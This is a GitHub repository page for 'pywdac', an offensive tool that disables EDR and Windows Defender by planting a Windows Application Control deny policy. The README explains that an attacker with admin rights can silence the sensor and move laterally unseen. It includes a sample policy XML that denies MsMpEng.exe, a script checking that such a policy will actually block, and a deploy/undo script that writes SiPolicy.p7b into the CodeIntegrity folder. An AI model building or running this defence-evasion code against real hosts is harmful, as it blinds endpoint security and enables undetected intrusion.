https://github.com/psycore8/pywdac
Kills EDR with Windows Defender Application Control
- Host: GitHub
- URL: https://github.com/psycore8/pywdac
- Owner: psycore8
- License: gpl-3.0
- Created: 2025-01-07T11:16:20.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2025-01-31T09:25:02.000Z (over 1 year ago)
- Last Synced: 2025-02-09T02:18:34.410Z (over 1 year ago)
- Language: Python
- Size: 17.6 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# pywdac
> Kills EDR with Windows Defender Application Control
Windows Defender Application Control (WDAC) is a policy-based application control system: a policy decides which programs, drivers and directories may run on the host, and everything else can be blocked.
A policy can, however, be written to deny the executables and drivers of an EDR product. WDAC enforces the policy in the kernel before the file is loaded, so the EDR never starts; even the built-in Windows Defender can be silenced this way.
An attacker who already holds administrative privileges on a host can deploy such a policy (the binary policy lives at C:\Windows\System32\CodeIntegrity\SiPolicy.p7b and is loaded at the next boot) and then operate, or move laterally from that host, without the sensor reporting anything.
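What such a policy looks like, and how to check one before it is converted to SiPolicy.p7b, is easier to see on a concrete file. The following is an added example written for this page, not code from pywdac: it parses the WDAC policy XML format that ConvertFrom-CIPolicy consumes and reports the settings that decide whether the policy can really stop an EDR. The sample policy embedded in it is constructed for the example; MsMpEng.exe (Defender's antimalware service process) is used as the denied binary.

```python
"""Triage a WDAC policy XML before it is converted to SiPolicy.p7b.

Example added for this page; it is not code from pywdac. It reports the
three things that decide whether a policy can stop an EDR: the Deny rules
that are referenced from a signing scenario (a rule that is defined but never
referenced has no effect), whether the policy is unsigned, and whether it is
in audit mode (audit mode only logs, it never blocks).
"""
import xml.etree.ElementTree as ET

NS = {"si": "urn:schemas-microsoft-com:sipolicy"}
SCENARIO_NAMES = {"12": "user mode", "131": "kernel mode"}  # SigningScenario Value

# Constructed sample policy: allow everything, deny one user-mode binary by its
# original file name, plus one Deny rule that is never referenced (no effect).
SAMPLE_POLICY = """<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy" PolicyType="Base Policy">
  <VersionEx>1.0.0.0</VersionEx>
  <Rules>
    <Rule><Option>Enabled:Unsigned System Integrity Policy</Option></Rule>
    <Rule><Option>Enabled:Advanced Boot Options Menu</Option></Rule>
  </Rules>
  <FileRules>
    <Allow ID="ID_ALLOW_ALL_1" FriendlyName="Allow everything" FileName="*" />
    <Deny ID="ID_DENY_EDR_1" FriendlyName="Block Defender engine"
          FileName="MsMpEng.exe" MinimumFileVersion="65535.65535.65535.65535" />
    <Deny ID="ID_DENY_UNUSED_1" FriendlyName="Never referenced" FileName="unused.exe" />
  </FileRules>
  <SigningScenarios>
    <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="User mode">
      <ProductSigners>
        <FileRulesRef>
          <FileRuleRef RuleID="ID_ALLOW_ALL_1" />
          <FileRuleRef RuleID="ID_DENY_EDR_1" />
        </FileRulesRef>
      </ProductSigners>
    </SigningScenario>
  </SigningScenarios>
</SiPolicy>
"""

# Same policy switched to audit mode: the Deny rule is then logged, not enforced.
AUDIT_VARIANT = SAMPLE_POLICY.replace("Enabled:Advanced Boot Options Menu", "Enabled:Audit Mode")


def triage_policy(xml_text: str) -> dict:
    """Return what the policy enforces and under which conditions."""
    root = ET.fromstring(xml_text)
    options = {o.text.strip() for o in root.iterfind("si:Rules/si:Rule/si:Option", NS) if o.text}

    # Index every file rule by ID so references from signing scenarios resolve.
    file_rules = root.find("si:FileRules", NS)
    rules = {}
    for rule in (list(file_rules) if file_rules is not None else []):
        kind = rule.tag.rsplit("}", 1)[-1]          # Allow, Deny, FileAttrib ...
        target = rule.get("FileName") or rule.get("FilePath") or rule.get("Hash")
        rules[rule.get("ID")] = (kind, target)

    # Only rules referenced from a SigningScenario are enforced at all.
    referenced, denies = set(), []
    for scen in root.iterfind("si:SigningScenarios/si:SigningScenario", NS):
        scope = SCENARIO_NAMES.get(scen.get("Value"), "scenario " + str(scen.get("Value")))
        for ref in scen.iterfind(".//si:FileRuleRef", NS):
            rid = ref.get("RuleID")
            referenced.add(rid)
            kind, target = rules.get(rid, (None, None))
            if kind == "Deny":
                denies.append((scope, target))

    audit = "Enabled:Audit Mode" in options
    return {
        "unsigned": "Enabled:Unsigned System Integrity Policy" in options,
        "audit_mode": audit,
        "denies": denies,
        "unreferenced_denies": sorted(r for r, (k, _) in rules.items() if k == "Deny" and r not in referenced),
        "blocks_anything": bool(denies) and not audit,
    }


if __name__ == "__main__":
    for name, text in (("enforced", SAMPLE_POLICY), ("audit", AUDIT_VARIANT)):
        print(name, triage_policy(text))
```

Run against a real template with `triage_policy(open("policy.xml").read())`. The two checks that matter most are `blocks_anything` (a Deny rule only bites when it is referenced from a signing scenario and the policy is not in audit mode) and `unsigned`: a signed policy cannot simply be overwritten by a file copy, which is exactly what the file-drop technique relies on.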
## pywdac features
pywdac first checks whether the CodeIntegrity directory is writable. If it is, the tool copies the binary policy file SiPolicy.p7b into that directory.
Additionally, the tool supports the following:
- Conversion of an XML policy template into the binary policy format
- Restarting the computer, so that the new policy is loaded
- Deleting the policy file from the directory again (undo)
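The deploy and undo steps above, as an added example written for this page (not pywdac's code). It differs from a bare copy and delete in two ways a practitioner will want: an existing SiPolicy.p7b is backed up first, so undo restores the host's original policy instead of leaving it with none, and the new file is written under a temporary name and renamed into place, so a half-written policy never exists on disk. The directory is a parameter so the logic can run in a temporary folder; the backup file name is an assumption of this example, and on a real host the policy is only loaded at the next boot.

```python
"""Deploy and undo a WDAC policy file (SiPolicy.p7b) with backup and restore.

Example added for this page; it is not pywdac's code. On a real host the
target is %SystemRoot%\\System32\\CodeIntegrity and the policy takes effect
at the next boot; here the directory is a parameter so demo() can exercise
the logic in a throwaway folder with constructed policy bytes.
"""
import hashlib
import os
import shutil
import tempfile
from pathlib import Path

POLICY_NAME = "SiPolicy.p7b"
BACKUP_NAME = "SiPolicy.p7b.orig"      # assumed backup name, kept beside the policy
DEFAULT_DIR = Path(os.environ.get("SystemRoot", r"C:\Windows")) / "System32" / "CodeIntegrity"


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def is_writable(directory: Path) -> bool:
    """Probe by creating a file: os.access() does not evaluate Windows ACLs reliably."""
    probe = directory / f".wdac_probe_{os.getpid()}"
    try:
        probe.write_bytes(b"")
        probe.unlink()
        return True
    except OSError:
        return False


def deploy(policy_src: Path, directory: Path = DEFAULT_DIR) -> dict:
    """Copy policy_src into directory as SiPolicy.p7b, preserving any existing policy."""
    if not is_writable(directory):
        raise PermissionError(f"no write access to {directory}")
    target, backup = directory / POLICY_NAME, directory / BACKUP_NAME
    backed_up = False
    if target.exists() and not backup.exists():    # keep only the first original
        shutil.copy2(target, backup)
        backed_up = True
    tmp = directory / (POLICY_NAME + ".tmp")
    shutil.copy2(policy_src, tmp)
    os.replace(tmp, target)                         # atomic rename within the same volume
    return {"target": str(target), "sha256": sha256_of(target), "backed_up": backed_up}


def undo(directory: Path = DEFAULT_DIR) -> str:
    """Restore the backed-up policy if there is one, otherwise delete ours."""
    target, backup = directory / POLICY_NAME, directory / BACKUP_NAME
    if backup.exists():
        os.replace(backup, target)
        return "restored"
    if target.exists():
        target.unlink()
        return "deleted"
    return "nothing to undo"


def demo() -> dict:
    """Run both scenarios in a temporary directory and report what happened."""
    out = {}
    with tempfile.TemporaryDirectory() as d:
        ci = Path(d)
        new_policy = ci / "new.p7b"
        new_policy.write_bytes(b"ATTACKER-POLICY")          # constructed policy bytes
        # Scenario 1: the host already has a policy; undo must bring it back.
        (ci / POLICY_NAME).write_bytes(b"ORIGINAL-POLICY")  # constructed host policy
        r1 = deploy(new_policy, ci)
        out["s1_backed_up"] = r1["backed_up"]
        out["s1_sha256"] = r1["sha256"]
        out["s1_after_deploy"] = (ci / POLICY_NAME).read_bytes()
        out["s1_undo"] = undo(ci)
        out["s1_after_undo"] = (ci / POLICY_NAME).read_bytes()
        # Scenario 2: the host had no policy; undo must simply remove ours.
        (ci / POLICY_NAME).unlink()
        r2 = deploy(new_policy, ci)
        out["s2_backed_up"] = r2["backed_up"]
        out["s2_undo"] = undo(ci)
        out["s2_policy_exists"] = (ci / POLICY_NAME).exists()
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The restore path matters on hosts that already run a legitimate WDAC policy: deleting SiPolicy.p7b there does not return the machine to its pre-attack state, it leaves it with no application control at all, which is noisy and is not what an operator cleaning up after an engagement wants.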
## usage
```shell
usage: pywdac.py [-h] [-d DIRECTORY] [-r] [-u] [-x XML_TEMPLATE]
options:
-h, --help show this help message and exit
-d, --directory DIRECTORY
Path to CodeIntegrity folder, where SiPolicy.p7b should be deployed
-r, --reboot Optional reboot after deployment, delayed for 60 seconds
-u, --undo Deletes SiPolicy.p7b from CodeIntegrity folder
-x, --xml-template XML_TEMPLATE
This will convert an XML policy template into SiPolicy.p7b
```